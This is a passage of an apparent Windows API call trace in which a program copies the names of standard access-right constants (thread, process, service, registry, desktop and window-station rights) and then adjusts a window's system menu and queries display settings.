[0100.233] SysReAllocStringLen (in: pbstr=0x29be600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29be600*="STANDARD_RIGHTS_ALL") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29be5f0*="DELETE") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29be5e0*="READ_CONTROL") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29be5d0*="WRITE_OWNER") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29be5c0*="WRITE_DAC") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x29be5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x29be5a0*="THREAD_IMPERSONATE") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x29be590*="THREAD_SET_THREAD_TOKEN") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x29be580*="THREAD_QUERY_INFORMATION") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x29be570*="THREAD_SET_INFORMATION") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x29be560*="THREAD_SET_CONTEXT") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x29be550*="THREAD_GET_CONTEXT") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x29be540*="THREAD_SUSPEND_RESUME") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x29be530*="THREAD_TERMINATE") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x29be520*="THREAD_ALL_ACCESS") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29be510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29be500*="STANDARD_RIGHTS_WRITE") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29be4f0*="STANDARD_RIGHTS_READ") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29be4e0*="STANDARD_RIGHTS_ALL") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29be4d0*="DELETE") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29be4c0*="READ_CONTROL") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29be4b0*="WRITE_OWNER") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29be4a0*="WRITE_DAC") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x29be490*="PROCESS_QUERY_INFORMATION") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x29be480*="PROCESS_SET_INFORMATION") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x29be470*="PROCESS_SET_QUOTA") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x29be460*="PROCESS_CREATE_PROCESS") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x29be450*="PROCESS_DUP_HANDLE") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x29be440*="PROCESS_VM_WRITE") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x29be430*="PROCESS_VM_READ") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x29be420*="PROCESS_VM_OPERATION") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x29be410*="PROCESS_SET_SESSIONID") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x29be400*="PROCESS_CREATE_THREAD") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x29be3f0*="PROCESS_TERMINATE") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x29be3e0*="PROCESS_ALL_ACCESS") returned 1
[0100.234] SysReAllocStringLen (in: pbstr=0x29be3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29be3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29be3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29be3b0*="STANDARD_RIGHTS_READ") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29be3a0*="STANDARD_RIGHTS_ALL") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29be390*="DELETE") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29be380*="READ_CONTROL") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29be370*="WRITE_OWNER") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29be360*="WRITE_DAC") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x29be350*="PERM_FILE_CREATE") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x29be340*="PERM_FILE_WRITE") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x29be330*="PERM_FILE_READ") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29be320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29be310*="STANDARD_RIGHTS_WRITE") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29be300*="STANDARD_RIGHTS_READ") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29be2f0*="STANDARD_RIGHTS_ALL") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29be2e0*="DELETE") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29be2d0*="READ_CONTROL") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29be2c0*="WRITE_OWNER") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29be2b0*="WRITE_DAC") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x29be2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x29be290*="PRINTER_ACCESS_USE") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x29be280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x29be270*="SERVER_ACCESS_ENUMERATE") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x29be260*="SERVER_ACCESS_ADMINISTER") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x29be250*="PRINTER_ALL_ACCESS") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x29be240*="PRINTER_EXECUTE") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x29be230*="PRINTER_WRITE") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x29be220*="PRINTER_READ") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x29be210*="PRINTER_ALL_ACCESS") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29be200*="DELETE") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29be1f0*="READ_CONTROL") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29be1e0*="WRITE_OWNER") returned 1
[0100.235] SysReAllocStringLen (in: pbstr=0x29be1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29be1d0*="WRITE_DAC") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x29be1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x29be1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x29be1a0*="SC_MANAGER_LOCK") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x29be190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x29be180*="SC_MANAGER_CONNECT") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x29be170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x29be160*="SC_MANAGER_ALL_ACCESS") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29be150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29be140*="STANDARD_RIGHTS_WRITE") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29be130*="STANDARD_RIGHTS_READ") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29be120*="STANDARD_RIGHTS_ALL") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29be110*="DELETE") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29be100*="READ_CONTROL") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29be0f0*="WRITE_OWNER") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29be0e0*="WRITE_DAC") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x29be0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x29be0c0*="SERVICE_STOP") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x29be0b0*="SERVICE_START") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x29be0a0*="SERVICE_QUERY_STATUS") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x29be090*="SERVICE_QUERY_CONFIG") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x29be080*="SERVICE_PAUSE_CONTINUE") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x29be070*="SERVICE_INTERROGATE") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x29be060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x29be050*="SERVICE_CHANGE_CONFIG") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x29be040*="SERVICE_ALL_ACCESS") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29be030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29be020*="STANDARD_RIGHTS_WRITE") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29be010*="STANDARD_RIGHTS_READ") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29be000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29be000*="STANDARD_RIGHTS_ALL") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29bdff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29bdff0*="DELETE") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29bdfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29bdfe0*="READ_CONTROL") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29bdfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29bdfd0*="WRITE_OWNER") returned 1
[0100.236] SysReAllocStringLen (in: pbstr=0x29bdfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29bdfc0*="WRITE_DAC") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x29bdfb0*="KEY_SET_VALUE") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x29bdfa0*="KEY_CREATE_LINK") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdf90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x29bdf90*="KEY_CREATE_SUB_KEY") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdf80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x29bdf80*="KEY_NOTIFY") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdf70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x29bdf70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdf60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x29bdf60*="KEY_QUERY_VALUE") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdf50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29bdf50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdf40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29bdf40*="STANDARD_RIGHTS_WRITE") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdf30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x29bdf30*="STANDARD_RIGHTS_READ 2") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdf20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x29bdf20*="STANDARD_RIGHTS_ALL 1") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdf10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29bdf10*="DELETE") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdf00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29bdf00*="READ_CONTROL") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdef0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29bdef0*="WRITE_OWNER") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29bdee0*="WRITE_DAC") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x29bded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x29bdec0*="DESKTOP_WRITEOBJECTS") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdeb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x29bdeb0*="DESKTOP_JOURNALRECORD") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x29bdea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bde90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x29bde90*="DESKTOP_HOOKCONTROL") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bde80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x29bde80*="DESKTOP_CREATEWINDOW") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bde70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x29bde70*="DESKTOP_CREATEMENU") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bde60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x29bde60*="DESKTOP_READOBJECTS") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bde50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x29bde50*="DESKTOP_ENUMERATE") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bde40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29bde40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bde30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29bde30*="STANDARD_RIGHTS_WRITE") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bde20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29bde20*="STANDARD_RIGHTS_READ") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bde10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29bde10*="STANDARD_RIGHTS_ALL") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bde00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29bde00*="DELETE") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29bddf0*="READ_CONTROL") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bdde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29bdde0*="WRITE_OWNER") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29bddd0*="WRITE_DAC") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x29bddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0100.237] SysReAllocStringLen (in: pbstr=0x29bddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x29bddb0*="WINSTA_READSCREEN") returned 1
[0100.238] SysReAllocStringLen (in: pbstr=0x29bdda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x29bdda0*="WINSTA_READATTRIBUTES") returned 1
[0100.238] SysReAllocStringLen (in: pbstr=0x29bdd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x29bdd90*="WINSTA_EXITWINDOWS") returned 1
[0100.238] SysReAllocStringLen (in: pbstr=0x29bdd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x29bdd80*="WINSTA_ENUMERATE") returned 1
[0100.238] SysReAllocStringLen (in: pbstr=0x29bdd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x29bdd70*="WINSTA_ENUMDESKTOPS") returned 1
[0100.238] SysReAllocStringLen (in: pbstr=0x29bdd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x29bdd60*="WINSTA_CREATEDESKTOP") returned 1
[0100.238] SysReAllocStringLen (in: pbstr=0x29bdd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x29bdd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0100.238] SysReAllocStringLen (in: pbstr=0x29bdd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x29bdd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0100.238] SysReAllocStringLen (in: pbstr=0x29bdd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29bdd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.238] SysReAllocStringLen (in: pbstr=0x29bdd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29bdd20*="STANDARD_RIGHTS_WRITE") returned 1
[0100.238] SysReAllocStringLen (in: pbstr=0x29bdd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29bdd10*="STANDARD_RIGHTS_READ") returned 1
[0100.238] SysReAllocStringLen (in: pbstr=0x29bdd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x29bdd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0100.238] SysReAllocStringLen (in: pbstr=0x29bdcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29bdcf0*="READ_CONTROL") returned 1
[0100.238] SysReAllocStringLen (in: pbstr=0x29bdce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x29bdce0*="SI_ACCESS_SPECIFIC") returned 1
[0100.238] SysReAllocStringLen (in: pbstr=0x29bdcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29bdcd0*="WRITE_DAC") returned 1
[0100.238] SysReAllocStringLen (in: pbstr=0x29bdcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x29bdcc0*="FILE_DELETE") returned 1
[0100.238] SysReAllocStringLen (in: pbstr=0x29bdcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x29bdcb0*="FILE_DELETE_CHILD") returned 1
[0100.239] SetClassLongA (hWnd=0x201de, nIndex=-14, dwNewLong=65575) returned 0x0
[0100.240] GetSystemMenu (hWnd=0x201de, bRevert=0) returned 0x201ab
[0100.240] DeleteMenu (hMenu=0x201ab, uPosition=0xf030, uFlags=0x0) returned 1
[0100.240] DeleteMenu (hMenu=0x201ab, uPosition=0xf000, uFlags=0x0) returned 1
[0100.240] DeleteMenu (hMenu=0x201ab, uPosition=0xf010, uFlags=0x0) returned 1
[0100.240] GetCurrentThreadId () returned 0xf80
[0100.240] ResetEvent (hEvent=0xa0) returned 1
[0100.240] GetCurrentThreadId () returned 0xf80
[0100.240] GetCurrentThreadId () returned 0xf80
[0100.240] GetCurrentThreadId () returned 0xf80
[0100.240] ResetEvent (hEvent=0xa0) returned 1
[0100.240] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xef33c, fWinIni=0x0 | out: pvParam=0xef33c) returned 1
[0100.240] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xef33c, fWinIni=0x0 | out: pvParam=0xef33c) returned 1
[0100.240] GetSystemMetrics (nIndex=49) returned 16
[0100.240] GetSystemMetrics (nIndex=50) returned 16
[0100.241] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xef384, fWinIni=0x0 | out: pvParam=0xef384) returned 1
[0100.241] IsWindowVisible (hWnd=0x201de) returned 0
